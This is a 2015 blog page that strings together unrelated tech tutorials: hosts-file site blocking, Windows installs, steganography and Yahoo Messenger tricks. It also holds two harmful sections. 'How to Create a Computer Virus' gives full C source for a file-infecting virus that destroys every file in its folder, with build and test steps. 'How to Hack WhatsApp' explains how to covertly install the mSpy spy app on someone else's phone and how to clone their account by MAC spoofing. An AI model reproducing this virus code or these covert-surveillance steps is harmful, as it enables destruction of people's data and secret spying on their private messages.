Wednesday, December 16, 2015

How to Block Websites On Your PC


वेबसाइट को ब्लॉक करना
DNS, which stands for Domain Name System, can convert the exclusive IPv4 or IPv6 addresses to meaningful names, and then translate the characters back to IP addresses. For example, when you want to visit a website, DNS will tell your web browser the real ip address of it and then web browser will download the web page directly from that IP address.
As you may expect, the process of translating IP addresses to website names will consume some time, which could cause access delay. Particularly, if the DNS servers are down, you will not be able to visit most websites through their URL, which isn’t uncommon.

Hence, it is necessary to make a list for mapping hostnames to IP addresses. That is whatWindows HOSTS file does. On most Windows systems, the HOSTS file content is used preferentially over other methods, such as the DNS. 

With the proper use of Windows HOSTS file, you can accelerate the access speed of favorite websites, test a website locally and even selectively block certain websites. 

In fact, blocking websites through the HOSTS file is an effective way to do it because it blocks it across all the browsers. 

Edit HOSTS File Manually 

Windows NT platform systems including Windows 2000, Windows XP and Windows 7 have their HOSTS file in the path%SystemRoot%\system32\drivers\etc\ (“%SystemRoot%” is relative path, which depends on the system-wide environment variable, it should be C:\Windows or C:\WINNT in most cases). 

Basically, you just need to type the above mentioned path in Windows search bar (or run box) to get to the “etc” folder where you’ll find the HOSTS file.

You can use any text editor to open the file and edit it manually.

Note: For Windows 7 users, there’s one more step. Type “Notepad” in Start Menu search bar, and then right click on the “Notepad” item, choose “Run as administrator”. Now you can open HOSTS file with “File -> Open” menu in notepad

The HOSTS file contains lines of text including an IP address and one or more host names. You can add the mapping relationship of each websites. The comment lines are indicated by a hash (#) character, which will be ignored by system.

To block a website, simply add a line like this:
127.0.0.1 example.com

127.0.0.1 (or Localhost) is the standard host-name given to the address of your computer. You mapped the website name to your PC, hence you can’t visit the site any more. So if you want to block Facebook, just add this line into Hosts file: 
127.0.0.1 facebook.com

Installing Windows Server 2012 (step by step)

Windows Server 2012, codenamed "Windows Server 8", is the sixth release of Windows Server. It is the server version of Windows 8 and succeeds Windows Server 2008 R2. Two pre-release versions, a developer preview and a beta version, were released during development. The software was generally available to customers starting on September 4, 2012.
In this easy step by step guide, we will learn how to install and activate Windows Server 2012.
Before you start make sure you have the minimum requirements to install Windows Server (Windows Server Requirements):
Processor: Minimum: 1.4 GHz 64-bit processor
Ram: Minimum: 512 MB
Disk Space: Minimum: 32 GB
Other requirements:
  • DVD drive
  • Super VGA (800 x 600) or higher-resolution monitor
  • Keyboard and Microsoft® mouse (or other compatible pointing device)
  • Internet access
 You can then download the evalution copy of Windows Server 2012 from here, Download the ISO and burn it to some DVD:
http://technet.microsoft.com/en-US/evalcenter/hh670538.aspx?ocid=&wt.mc_id=TEC_108_1_33

Now that we have everything we need, We can Start:
1- Insert the Windows Server 2012 DVD, and once you get the following message press Enter to boot from the setup
2- Wait for a while till the setup loads all necessary files (Depending on your machine, it will take couple of minutes)
 3- Once the setup files are loaded, the setup will start with the following screen. You can change these to meet your needs (the default values should be fine for now)
 4- Once you click Next, you can start the installation, click "Install now"
5- You will see the following screen, wait until it finishes loading
6- In the following setup screen, you will see four options. Select Windows Server 2012 DataCenter Evaluation (Server With GUI).
7- After you click Next from previous screen, Read the License terms, tick the "I accept the license terms" and click Next
8- Now It will ask you for the drive (or partition) you want to install Windows on. Here I'm installing it on the one partition I have here. NOTE: This will remove the content of the partition. Either you create a partition to install windows on, or you can test this on a testing machine
9- Now once we picked our partition, clicking on next from previous screen will start the setup. This process might take a while.
10- Once the setup is done, it will restart and start your Windows Server 2012 for the first time. It will ask you then to set up a password for the Administrator user
11- The setup will finalize your settings, might take a couple of minutes

12- Once the setup is done, you can log in for the first time to your Windows Server, as the screen says, press Ctrl+Alt+Delete to log in, and use the password you set in the setup process


13 - Once you Log in, Windows Server 2012 will show the Server Manager


Congratulations! you have now Windows server 2012 Installed with Datacenter

Sunday, December 13, 2015

How to Hack Yahoo Messenger

Hack yahoo messangerYahoo Messenger is one of the highly popular and most widely used instant messaging service in the world offering a wide variety of features to its users, all for free. This has made it the right choice for all those who are waiting to chat and communicate with their far away friends and relatives.
However, while some people use Yahoo Messenger only to chat with their friends and known ones, many others use it to have fun by joining the chat rooms and chatting with the strangers. If you’re a similar person who would like to have fun during the chat, this post if for you!
In this post, I will show you some really interesting Yahoo Messenger hacks using which it is possible to play pranks with your friends and strangers during the chat. Below is a list of some cool hacks that you’re sure to enjoy:

1. Chat with Multiple Names Simultaneously

How about chatting with your friend with two or more different names at a time? Well, do not think that this is impossible! This can easily be done with a simple workaround which enables you to chat with as many different names as you can with the same or different people.
For example, you may chat with Person-A using one name and with Person-B using the other. You can also chat with the same person using different names or any other combination. All of this goes really unnoticed by the user on the other side, while you are sure to have some real fun.
Here is a step-by-step procedure to implement this hack:
  1. Sign in to your Yahoo Messenger. From the top, click onMessenger -> My Account Info. You will be taken to a web page where you need to log in to your account.
  2. Now, you should be on the Profile Settings page. Scroll down to see the option Account Settings as shown below. From there, click on the link which says: “Manage your Yahoo! aliases”.
    Create Aliases in Yahoo
  3. From the Aliases page, click on: “Add an alias”. You can create as many aliases you want. Choose unique names for your alias and once you’re done, click on “close”.
  4. You need to sign out of Yahoo Messenger and sign in again to see the changes. Once you have done this, double-click on any name from your contact list or chat room to open a new chat window. You should now see a list of your aliases appearing in the chat window to choose from.
    Yahoo Chat with Multiple Names
  5. To chat with multiple names with a single person, just follow the steps below:
    • Double-click on the name of the person in the chat room or contact list.
    • Select any name from your “alias” list and ping the user with that name. Immediately close the chat window before you get a reply from that person.
    • Again double-click on the same person’s name and ping him/her with another name from your “alias” list. This time do not close the window.
    • Just wait a few seconds! When the person replies to both your pings, you will have two tabs in the same chat window from where you can chat with the same person using two different names. Enjoy!!!
Before you try this hack, make sure that you have not set any display image for your profile. If not, there are chances of other person identifying your prank.
To disable the display image, just click on Messenger ->My Display Image from the top menu of your YM window and set the option to “Don’t share a display image”.
I hope you like this hack. Now let us move forward to our next hack that is even more exciting!

2. Play Prank with Your Friends Using a Fake Webcam

Ever wanted to fool your friends with a fake web camera? If so, here is a cool hack using which it is possible to fool users on Yahoo Messenger with a fake webcam on your computer. Below is a step-by-step procedure to configure the fake webcam on your computer:
  1. Download Fake Webcam software from the following link:
  2. Install Fake Webcam on your computer and configure it as follows.
  3. From your Yahoo Messenger window, click on “Messenger” at the top and select the option “My Webcam”.
  4. You should now get a blank Webcam Broadcast window. From there, click on File -> Preferences to open the “Yahoo! Messenger Preferences” window as shown below. From the “Category” list, select the option “Webcam Broadcast”.
    Configure Fake Webcam
  5. As shown in the above snapshot, click on “Camera Source”, select “Fake Webcam Source” as your source of camera and click on “OK”.
  6. Now, open the Fake Webcam application, load your favorite video and click on play button. You should now see the same video appearing on the Yahoo Messenger video broadcast window as show below:
    Fake Webcam in Action
  7. Click on “Broadcast” button on the Yahoo Messenger webcam window to start broadcasting the video.
If you are using aliases, you can change your webcam profile from File -> Change Profile option on the webcam window to enable the webcam for the current alias.
That’s it! You now have the fake webcam running on your computer.

3. Yahoo Messenger Invisible Hack

Most users on Yahoo Messenger hide their presence by activating the “invisible mode”, so that they appear as offline to everyone. But, how do you find out their true status? Well, here is a Yahoo Messenger invisible hack to catch those users who are hiding their true status by activating the “invisible mode”.
There are many tools out there to do this job, but most of them are found to have been infected with trojan and other malware. However, I have found some of the free online services that help you identify the true status of Yahoo users:
Just visit any of the above mentioned websites, enter the target Yahoo ID or screenname that you want to check and press the search button. With in a few seconds you will find out the true status of the user.

Hide Data in Image, Audio and Video Files: Steganography

Hide data in audio video image files

What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.
The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.

What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.
Even though steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Rumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.

How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.
There are many steganography tools available online but only a few are able to work flawlessly. I did not find any tool that worked perfectly on both small and large data. However, I have  managed to develop my own tool that can work perfectly on all types of files and all size of data. The tool is called “Stego Magic“. You can download it from the following link.
The zip file contains two versions of Stego Magic: One for encrypting the text messages and the other for encrypting binary files. StegoMagic_TXT can be used to hide text messages in other files such as an image or a sound file. StegoMagic_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file.
With Stego Magic, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept.
At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process.

How to Use Stego Magic?

Suppose you want to hide a text message inside a JPG file:
  1. Place the JPG and the text file (.txt) in the same folder as that of StegoMagic_TXT.exe
  2. Run StegoMagic_TXT.exe and follow the screen instructions to embed the text message inside the JPG image.
    Please note that if you’re using Windows 7/Vista, right-click the file and select “Run as Administrator”. Otherwise the tool may fail to work properly.
  3. Note down the secret decryption key.
Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Stego Magic tool and use the secret decryption key.
I hope you’ve now understood what is steganography and how to use it to hide your secret data. For queries and feedback, please pass your comments.

how to install windows 7 from a usb drive

Installing Windows from a USB flash drive has several advantages – First of all, the overall speed of the installation process will increase significantly, carrying a USB stick is much more convenient than a DVD, and finally it becomes possible to install the OS even on those systems that do not have a DVD drive, such as a netbook.
In this post, I will show you how to load the Windows installation on to your USB flash drive and make it bootable just like the DVD.

Tools Required to Load Windows 7 Installation Files:

  1. USB flash drive with a minimum capacity of 4 GB.
  2. Windows 7 set-up DVD.
Now, just follow the steps below:

Step-1:

Plug-in your USB flash drive and backup all the existing data in it.
Open the command prompt. If you are using Windows 7/Vista then open it with administrator rights.
Go to Start -> All Programs -> Accessories -> Right-click on “Command Prompt” and select “Run as Administrator”.

Step-2:

In the command prompt, type in the following command:
DISKPART
This will start the Microsoft DiskPart utility as shown below:
Microsoft DiskPart

Step-3:

Now issue the following command:
LIST DISK
This will show you a list of  available disks on your system. Disk 0 is usually the hard disk. In my case, Disk 5 is the USB drive (this can be a different one in your case). Now issue the command as shown below:
SELECT DISK 5
Install Windows 7 from USB
NOTE: In the above command, 5 is the USB drive number on my system. If you have a different number on your system, then you need to replace 5 with that number.

Step-4:

Now issue the following list of commands one by one as shown below:
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS QUICK
ASSIGN
EXIT
Install Windows 7 from USB
Minimize the command prompt and proceed to the next step.

Step 5:

Insert the Windows 7/Vista installation disc and note down the “drive letter” of your DVD drive. In my case, it is “H:”. Now type the following list of commands as shown below:
H: CD BOOT
CD BOOT
BOOTSECT.EXE /NT60 M: (NOTE: M: is your USB drive letter)
EXIT
Win 7 from USB flash drive

Step-6:

Copy the contents of your Windows 7/Vista installation disk into the USB flash drive.
That’s it! Your USB stick is now ready to boot and install the Windows 7 for you. Don’t forget to enable the “USB Boot” option and change the “boot priority to USB device from hard disk” in your BIOS settings.
I hope you like this post. Pass your comments to express your opinion. :)

How to Hack WhatsApp Accounts

Need to Hack WhatsApp Account?
Below is a WhatsApp Hack Guide with Complete Instructions!
Learn how to hack WhatsApp in simple steps with the following easy to follow and foolproof tutorial. Since WhatsApp has become one of the popular app to share messages and media instantly, it has also become a favorite place for many to engage in illicit activities. Therefore, in order to investigate the truth people are left with no choice other than to hack WhatsApp account.

Possible Ways to Hack WhatsApp

The following are the only two ways to hack WhatsApp account:

1. WhatsApp Hack using a Spying App: The Easiest Way

Even though there are several ways to hack WhatsApp, using a spy app is by far the most simple and easiest way. This method requires no prior hacking knowledge or technical skills to carry out and hence more suitable for common people. Installing a spy app to hack WhatsApp is as simple as installing any other app on mobile. Out of several apps out there, mSpy is one of my favorite one to hack WhatsApp:
mSpy Features:
  • Hack phone Calls and Text Messages.
  • Hack WhatsApp, Skype and other popular messengers.
  • Track Real-Time Location with GPS Tracker.
  • Spy on Contact List and Web Browsing activities.
  • Monitor Emails, Pictures and Videos.
  • Operates in Hidden Mode and remains Undetected!
  • No Rooting Required!

How to Hack WhatsApp with this App?

  1. Download and Install the app on to the target phone which takes not more than a minute.
  2. After this is done, the app silently records all WhatsApp activities in hidden mode.
  3. All the recorded WhatsApp chat is sent to your online account.
  4. View all the information from anywhere at anytime with your online account.
You can download mSpy from the link below:
Compatiblity: Android, Apple iPhone, BlackBerry and Windows Mobile.

2. WhatsApp Hack by Spoofing Mac Address: The Tough Way

There is another method to hack WhatsApp known as Mac address spoofing which involves spoofing the Mac address of the target phone on your own phone. Unlike using spy apps, this one is somewhat time consuming and requires technical skills to implement. To spoof the Mac of the target WhatsApp phone address, follow the below mentioned steps:
  1. Find out the Mac address of the target phone on which you need to hack WhatsApp account:
    • For Android – Navigate to Settings —> About Device —> Status—> Wi-Fi MAC address
    • For iPhone – Navigate to Settings—> General —> About —> Wi-Fi address
  2. Once you’ve the Mac address of the target WHatsApp phone, you can spoof the Mac address as mentioned in my post:How to Spoof the MAC address.
  3. Next, install WhatsApp on your phone using the target phone number and verify it.
  4. Now, you’ve an exact replica of the target WhatsApp account and you should receive all the conversation and updates on your phone as well.
This method of WhatsApp hacking is quite time consuming and is known to have less success rate when compared to the method of using the spy apps. Therefore, if you are someone who does not have sufficient time and skills to implement this, I still recommend the use of mSPy to successfully hack WhatsApp account.

DISCLAIMER: USAGE OF SPY APP WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS AND YOU DO IT AT YOUR OWN RISK!

How to Create a Computer Virus

This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],"rb"); 
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL) goto next;
x=89088;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n",
(end-st)/CLK_TCK);
getch();
}


This virus is designed to infect all types of files with any extension.

You can download the source code from the following link:


How the Virus Program Works?

The algorithm of this virus program is as follows:
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.

How to Compile the Program:

For a step-by-step guide, you can refer my detailed post on how to compile C programs?

How to Test the Virus After the Compilation:

  1. Create a new empty folder.
  2. Put some executable files (or any other files) in the folder.
  3. Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
  4. Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.

NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.


WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.
Contect- Rajnish Jaiswal 9628273549

QUESTIONS FOR CAMPUS INTERVIEW with answers 65

Q1:- Differentiate between RAM and ROM? RAM stands for Random Access Memory. It can store information and have new information stored o...